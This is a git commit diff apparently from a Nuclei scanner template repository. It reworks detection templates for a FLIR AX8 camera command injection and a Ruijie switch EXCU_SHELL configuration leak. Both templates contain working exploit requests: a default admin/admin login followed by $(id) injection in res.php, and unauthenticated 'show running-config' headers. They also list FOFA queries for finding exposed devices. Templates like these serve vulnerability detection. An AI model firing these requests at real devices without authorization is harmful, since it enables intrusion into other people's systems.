fix templates

2023-08-17 18:36:17 +05:30 · 2023-08-17 18:36:17 +05:30 · dcd8d7fa30
parent 0a51273b76
commit dcd8d7fa30
4 changed files with 91 additions and 74 deletions
--- a/http/vulnerabilities/FLIR-AX8-RCE.yaml
+++ b/http/vulnerabilities/FLIR-AX8-RCE.yaml
@ -1,35 +0,0 @@
-id: FLIR-AX8-RCE
-
-info:
-  name: FLIR-AX8-RCE
-  author: momika233
-  severity: high
-  reference:
-    - https://www.exploit-db.com/exploits/45602
-  description: The FLIR AX8 thermal sensor camera suffers from two unauthenticated command injection vulnerabilities. The issues can be triggered when calling multiple unsanitized HTTP GET/POST parameters within the shell_exec function in res.php and palette.php file. This can be exploited to inject arbitrary system commands and gain root remote code execution.
-  metadata:
-    max-request: 1
-    verified: true
-    fofa-query: app="FLIR-FLIR-AX8"
-
-  tags: FLIR-AX8,RCE
-
-requests:
-  - raw:
-      - |
-        POST /res.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        action=node&resource=$(id)
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "uid=.*"
-        part: body
-
-      - type: status
-        status:
-          - 200
--- a/http/vulnerabilities/other/flir-ax8-rce.yaml
+++ b/http/vulnerabilities/other/flir-ax8-rce.yaml
@ -0,0 +1,53 @@
+id: flir-ax8-rce
+
+info:
+  name: FLIR-AX8 res.php - Remote Code Execution
+  author: momika233
+  severity: critical
+  description: |
+    Remote Command Execution vulnerability in the FLIR-AX8 res.php file, the attacker obtains server permissions after logging in to the background with the default password.
+  reference:
+    - https://www.exploit-db.com/exploits/45602
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20res.php%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="FLIR-FLIR-AX8"
+  tags: flir-ax8,rce,exploitdb,iot,sensor
+
+variables:
+  username: admin
+  password: admin
+
+http:
+  - raw:
+      - |
+        POST /login/dologin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_name={{username}}&user_password={{password}}
+
+      - |
+        POST /res.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=node&resource=$(id)
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - '"success"'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body_2
+        regex:
+          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
--- a/http/vulnerabilities/ruijie/Ruijie-switch-EXCU_SHELL-info-leakage.yaml
+++ b/http/vulnerabilities/ruijie/Ruijie-switch-EXCU_SHELL-info-leakage.yaml
@ -1,39 +0,0 @@
-id: Ruijie-switch-EXCU_SHELL-info-leakage
-
-info:
-  name: Ruijie switch WEB management system EXCU_SHELL information leakage
-  author: momika233
-  severity: high
-  reference:
-    - https://https://github.com/momika233
-  description: Ruijie switch WEB management system EXCU_SHELL information leakage
-  metadata:
-    max-request: 1
-    verified: true
-    fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
-
-  tags: Ruijie-switch,info-leakage
-
-requests:
-  - raw:
-      - |
-        GET /EXCU_SHELL HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: close
-        Cmdnum: '1'
-        Command1: show running-config
-        Confirm1: n
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "Building configuration.*"
-        part: body
-
-      - type: status
-        status:
-          - 200
--- a/http/vulnerabilities/ruijie/ruijie-excu-shell.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-excu-shell.yaml
@ -0,0 +1,38 @@
+id: ruijie-excu-shell
+
+info:
+  name: Ruijie Switch Web Management System EXCU_SHELL - Information Disclosure
+  author: momika233
+  severity: high
+  description: |
+    Ruijie switch WEB management system is vulnerable to an EXCU_SHELL information disclosure issue, potentially exposing sensitive system information to unauthorized parties.
+  reference:
+    - https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL
+    - https://github.com/ibaiw/2023Hvv/blob/main/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BA%20WEB%20%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20EXCU_SHELL%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
+  tags: ruijie,switch,disclosure,misconfig
+
+http:
+  - raw:
+      - |
+        GET /EXCU_SHELL HTTP/1.1
+        Host: {{Hostname}}
+        Cmdnum: '1'
+        Command1: show running-config
+        Confirm1: n
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Building configuration"
+          - "Current configuration"
+        condition: and
+
+      - type: status
+        status:
+          - 200